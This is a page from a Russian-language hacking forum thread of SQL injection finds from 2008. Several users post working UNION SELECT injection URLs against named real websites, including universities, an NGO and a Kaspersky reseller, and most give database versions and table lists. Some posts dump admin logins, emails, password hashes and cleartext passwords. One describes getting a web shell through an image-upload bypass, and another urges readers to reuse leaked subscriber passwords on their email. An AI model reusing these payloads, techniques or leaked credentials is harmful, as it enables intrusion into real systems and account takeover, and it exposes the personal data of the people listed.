ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
Перезагрузить страницу SQL Инъекции
   
 
Страница 667 из 1242 « Первая < 167567617657 663 664 665 666 667 668 669 670 671 6777177671167 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #6661  
Старый 25.09.2008, 08:14
3xIm3
Познающий
Регистрация: 19.09.2008
Сообщений: 95
Провел на форуме:
399173

Репутация: 102
По умолчанию
Код:
http://www.greenecountyfoundation.org/news.php?id=-10+union+select+1,2,version(),4,5--
5.0.51a-community-log
 

  #6662  
Старый 25.09.2008, 09:18
Iceangel_
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206

Репутация: 1861


По умолчанию
Код:
http://www.tgchat.co.uk/profile.php?id=-146+union+select+1,version(),3,4,5,6,7,8,9,10,11/*
5.0.45

некоторые таблицы...
Код:
PrivatePictures
new_access
new_authmap
new_filters
new_forum
new_profile_fields
new_profile_values
new_system
new_users
-----------
Код:
http://www.fergusonhill.co.uk/product_details.php?id=7+union+select+1,2,3,4,5,6,7,8,9,version(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86/*
4.1.22-standard
-----------
Код:
http://www.forensicrecords.co.uk/artistdetail.php?id=-216+union+select+1,version(),3,4/*
5.0.27
----------
Код:
http://www.welovemarlborough.co.uk/marlborough_news.php?id=-88++union+select+1,password,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+users/*
----------
Код:
http://fat-cat.co.uk/fatcat/artistInfo.php?id=-53++union+select+1,login,3,4,5,6,7+from+users/*
iwantiwantiwant:Seiji25x
----------
mysql.user:
root:*5D769374F92AB78666CB6CDADBE62DB99DBE8411
----------
Код:
http://www.snseurope.com/snslink/news/news-full.php?id=-3565+union+select+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+users/*
 

  #6663  
Старый 25.09.2008, 17:03
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию
Цитата:
http://www.mayores.uji.es/canal.php?id=152[sql]
Dbname: mayores
Version: 5.0.20a-log
User: mayores@localhost

http://www.mayores.uji.es/joomla/
http://www.mayores.uji.es/forum/
Цитата:
Table [mayores]
Table [canales]
Table [documentos]
Table [drupal_access]
Table [drupal_accesslog]
Table [drupal_actions]
Table [drupal_actions_aid]
Table [drupal_aggregator_category]
Table [drupal_aggregator_category_feed]
Table [drupal_aggregator_category_item]
Table [drupal_aggregator_feed]
Table [drupal_aggregator_item]
Table [drupal_authmap]
Table [drupal_batch]
Table [drupal_blocks]
Table [drupal_blocks_roles]
Table [drupal_boxes]
Table [drupal_cache]
Table [drupal_cache_block]
Table [drupal_cache_filter]
Table [drupal_cache_form]
Table [drupal_cache_menu]
Table [drupal_cache_page]
Table [drupal_cache_update]
Table [drupal_comments]
Table [drupal_files]
Table [drupal_filter_formats]
Table [drupal_filters]
Table [drupal_flood]
Table [drupal_history]
Table [drupal_languages]
Table [drupal_locales_source]
Table [drupal_locales_target]
Table [drupal_menu_custom]
Table [drupal_menu_links]
Table [drupal_menu_router]
Table [drupal_node]
Table [drupal_node_access]
Table [drupal_node_comment_statistics]
Table [drupal_node_counter]
Table [drupal_node_revisions]
Table [drupal_node_type]
Table [drupal_permission]
Table [drupal_poll]
Table [drupal_poll_choices]
Table [drupal_poll_votes]
Table [drupal_role]
Table [drupal_search_dataset]
Table [drupal_search_index]
Table [drupal_search_node_links]
Table [drupal_search_total]
Table [drupal_sessions]
Table [drupal_system]
Table [drupal_term_data]
Table [drupal_term_hierarchy]
Table [drupal_term_node]
Table [drupal_term_relation]
Table [drupal_term_synonym]
Table [drupal_upload]
Table [drupal_url_alias]
Table [drupal_users]
Table [drupal_users_roles]
Table [drupal_variable]
Table [drupal_vocabulary]
Table [drupal_vocabulary_node_types]
Table [drupal_watchdog]
Table [enc_encuestas]
Table [enc_preguntas]
Table [enc_respuestas]
Table [enc_valores]
Table [foros_foros]
Table [foros_moderadores]
Table [foros_temas]
Table [foros_textos_tema]
Table [joomla_banner]
Table [joomla_bannerclient]
Table [joomla_bannertrack]
Table [joomla_categories]
Table [joomla_components]
Table [joomla_contact_details]
Table [joomla_content]
Table [joomla_content_frontpage]
Table [joomla_content_rating]
Table [joomla_core_acl_aro]
Table [joomla_core_acl_aro_groups]
Table [joomla_core_acl_aro_map]
Table [joomla_core_acl_aro_sections]
Table [joomla_core_acl_groups_aro_map]
Table [joomla_core_log_items]
Table [joomla_core_log_searches]
Table [joomla_custom_properties]
Table [joomla_custom_properties_fields]
Table [joomla_custom_properties_values]
Table [joomla_easybook]
Table [joomla_easybook_badwords]
Table [joomla_easycaptcha_config]
Table [joomla_easycaptchas]
Table [joomla_easycaptchas_dpaulus]
Table [joomla_easycaptchas_secimg]
Table [joomla_easycomments]
Table [joomla_easygb]
Table [joomla_groups]
Table [joomla_idoblog_comments]
Table [joomla_idoblog_friends]
Table [joomla_idoblog_tags]
Table [joomla_idoblog_tags_reffer]
Table [joomla_idoblog_user_reffer]
Table [joomla_idoblog_users]
Table [joomla_ja_acl]
Table [joomla_ja_captcha]
Table [joomla_jce_extensions]
Table [joomla_jce_groups]
Table [joomla_jce_plugins]
Table [joomla_joomla_flash_uploader]
Table [joomla_joomla_flash_uploader_conf]
Table [joomla_joomla_flash_uploader_user]
Table [joomla_menu]
Table [joomla_menu_types]
Table [joomla_messages]
Table [joomla_messages_cfg]
Table [joomla_migration_backlinks]
Table [joomla_modules]
Table [joomla_modules_menu]
Table [joomla_newsfeeds]
Table [joomla_plugins]
Table [joomla_poll_data]
Table [joomla_poll_date]
Table [joomla_poll_menu]
Table [joomla_polls]
Table [joomla_sections]
Table [joomla_session]
Table [joomla_stats_agents]
Table [joomla_templates_menu]
Table [joomla_users]
Table [joomla_weblinks]
Table [joomla_yvcomment]
Table [mc_accesos]
Table [mc_chat]
Table [phpbb_auth_access]
Table [phpbb_banlist]
Table [phpbb_categories]
Table [phpbb_config]
Table [phpbb_confirm]
Table [phpbb_disallow]
Table [phpbb_forum_prune]
Table [phpbb_forums]
Table [phpbb_groups]
Table [phpbb_posts]
Table [phpbb_posts_text]
Table [phpbb_privmsgs]
Table [phpbb_privmsgs_text]
Table [phpbb_ranks]
Table [phpbb_search_results]
Table [phpbb_search_wordlist]
Table [phpbb_search_wordmatch]
Table [phpbb_sessions]
Table [phpbb_sessions_keys]
Table [phpbb_smilies]
Table [phpbb_themes]
Table [phpbb_themes_name]
Table [phpbb_topics]
Table [phpbb_topics_watch]
Table [phpbb_user_group]
Table [phpbb_users]
Table [phpbb_vote_desc]
Table [phpbb_vote_results]
Table [phpbb_vote_voters]
Table [phpbb_words]
Table [portada]
Table [tablon]
 

  #6664  
Старый 25.09.2008, 19:51
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141

Репутация: 3099


По умолчанию
Цитата:
Сообщение от Gema  
помогите заюзать http://ktools.net/news_detail.php?nid=' нужно вытащить двиги которые продаются
http://ktools.net/news_detail.php?nid=999+union+select+1,version(),3 ,4,5--

четверка дело времени а вообще молодой человек тут не место для вопросов (в этом топе)
Последний раз редактировалось xcedz; 25.09.2008 в 19:54..
 

  #6665  
Старый 26.09.2008, 00:17
je0n
Постоянный
Регистрация: 14.05.2006
Сообщений: 334
Провел на форуме:
1543521

Репутация: 272
Отправить сообщение для je0n с помощью ICQ
По умолчанию
http://www.kaspersky.ee/ ля-ля-ля
Код:
http://www.kaspersky.ee/index.php?area=1&p=gallery&action=showimages&galid=-1+union+select+0,concat_ws(0x2F,uname,email,pass),2+from+kpro_user+where+ugroup=1+limit+0,1
http://www.kaspersky.ee/admin/
leroi/leroi@starman.ee/c263dbf51a63271ae226609fc8d8cace:star59
vasja/toivo.peegel@kaspersky.ee/046833087b7f4017c7e9c9644176fed1
kaspersky/eugene.savitsky@kaspersky.ee/92b36ff295fc38a4a2e773e19d6b3b34
sky_pets/sky@pets.ee/cb2513e0bbfc31544af7948592527bd0
kass_ru/pjotr.tsvetkov@menelon.ee/7c3d596ed03ab9116c547b0eb678b247:aaaaaa
 

  #6666  
Старый 26.09.2008, 03:49
3xIm3
Познающий
Регистрация: 19.09.2008
Сообщений: 95
Провел на форуме:
399173

Репутация: 102
По умолчанию
Код:
http://www.kelbike.fr/search.php?q=deda&pmin=&pmax=&brand=&limite=80&ps=&po=&pv=&ls=0&ct=-1/**/UNION/**/SELECT/**/VERSION(),2,3/**/LIMIT/**/1,1/*
5.0.32-Debian_7etch6-log

Код:
http://www.kelbike.fr/search.php?q=deda&pmin=&pmax=&brand=&limite=80&ps=&po=&pv=&ls=0&ct=-1/**/UNION/**/SELECT/**/CONCAT_WS(0x3A,user_nom,user_pwd),2,3/**/FROM/**/dc_user/**/LIMIT/**/1,1/*
admin:kelbike1 админку не нашел

Код:
http://www.hrusa.org/field/listings.php?catid=-1+union+select+concat_ws(0x3a,version(),user(),database()),2,3,4/*
5.0.45:hrusa@lawweb2-private:hrusa

Код:
http://www.hrusa.org/field/listings.php?catid=-1+union+select+concat_ws(0x3a,name,password),2,3,4+FROM+users+limit+0,1/*
admin:hrcalendar к админке не подходит
 

  #6667  
Старый 26.09.2008, 19:30
Iceangel_
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206

Репутация: 1861


По умолчанию
хекаем .edu
на всех 5-я версия мускула...

http://www.stots.edu/article.php?id=-46+union+select++1,2,concat(user,0x3a,password,0x3 a,host),4,5,6,7,8+from+mysql.user+limit+1,1/*
5.0.27-standard
в теме "Расшифровка хешей" я выкладывал выуженные хеши, там даже мне их частично расшифровали...

http://www.psych.utah.edu/people/gradstud.php?id=-131+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,15, 16,17,18/*
5.0.22-log 3


http://dma.ucla.edu/people/faculty.php?ID=-9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16/*
5.0.45 4
Последний раз редактировалось Iceangel_; 26.09.2008 в 19:35..
 

  #6668  
Старый 27.09.2008, 02:20
groupby
Познающий
Регистрация: 21.09.2008
Сообщений: 42
Провел на форуме:
127017

Репутация: 61
По умолчанию
итак. Нашел я сайтик: http://baltportal.ru

Общая инфа:
Цитата:
MySQL version: 5.0.51a-community
MySQL user: nwlove_baltru@localhost
MySQL database: nwlove_baltru
Таблицы:
Цитата:
_news
_news_comm
_news_type
active_session
auth_user
banks
banks_cat
cash
dt_anekdot
dt_city
dt_notice
faq
help
log_stat
portals
reklama
types
types_rights
vote
vote_answer
vote_ask
vote_votes
Некоторые поля из талицы auth_user: name, nik, password, admin, email
Чувак, который походу админ: Дмитрий Шахов1,
Администратор, pwdportalpwd, msa@dimsign.ru

Не знаю почему, но с этими данными админский доступ получить не смог (.
Я не отчаялся. Получил пользовательский доступ и пошел рыть дальше.
В редактировании профиля предлагается загрузить картинку. Если ты грузишь не картинку а пхп-файл, то это жестко пресекается ))) А если файл назвать не файл.пхп, а файл.жпг.пхп, то все чудесно проходит и ты получаешь удаленный шелл. Проблема только в том, что у этого шела права ограниченные (видимо там права более менее нормально на папку с картинками настроили).
В общем если кто-то чего-то дальше раскопает тут, буду рад получить доп. инфу в личку.
Кстати, если кому-то нужна программа для ускорения поиска таблиц и генерации инъекций, пишите в личку (SQLInjectHelper).
 

  #6669  
Старый 27.09.2008, 07:11
slider
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
Провел на форуме:
6520559

Репутация: 2947


По умолчанию

http://mobila.kz

вообщемс... там весь сайт ... одна большая скуля.....
удобный вывод в цикле .. не может не порадовать глаз....

Цитата:
http://mobila.kz/item_pop_up.php?item_id=-852+union+select+1,2,3,4,5,6,7
Цитата:
http://mobila.kz/item_pop_up.php?item_id=-6+union+select+1,2,3,4,5,column_name,7+from+inform ation_schema.columns+where+table_name=char(115,98, 115,95,117,115,101,114)



PR тИЦ Alexa
3 20 1773095
Последний раз редактировалось slider; 27.09.2008 в 07:14..
 

  #6670  
Старый 27.09.2008, 12:14
USAkid
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
Провел на форуме:
964766

Репутация: 228
По умолчанию
БЕЛОРУССКАЯ АССОЦИАЦИЯ СОЦИАЛЬНЫХ РАБОТНИКОВ

http://basw-ngo-by.net/

Фух бла, ну и заепался я его исследовать. Таблицы какие-то странные ваще вконце пошли. Но сам результат:

Код:
http://basw-ngo-by.net/page.php?parent=0&issue_id=2613+union+select+1,2,version(),4,5,6,7,8,9,10,11,12--
5.0.51a-community-log

Таблиц всего 59 насчитал. Перечислять тут небуду, т.к. займет много места)

Главное - в таблице basw_ru_subscribers был обнаружен столбец - pass. Чем она собсна мя и заинтересовала:

Код:
http://basw-ngo-by.net/page.php?parent=0&issue_id=2613+union+select+1,2,column_name,4,5,6,7,8,9,10,11,12+from+information_schema.columns+where+table_name=0x626173775f72755f7375627363726962657273+limit+0,1--
Код:
id
name
last_name
email
pass
group2
name_org
time
Код:
http://basw-ngo-by.net/page.php?parent=0&issue_id=2613+union+select+1,2,concat_ws(id,0x3a,name,0x3a,pass),4,5,6,7,8,9,10,11,12+from+basw_ru_subscribers+limit+0,1--
Ну и пошли логины и пассы (в открытом виде)

Раз сайт "Ассоциация.....", то вполне возможно ассоциировать етот пароль с настоящим мылом. Кому захочется - пробуйте
 
 
Страница 667 из 1242 « Первая < 167567617657 663 664 665 666 667 668 669 670 671 6777177671167 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ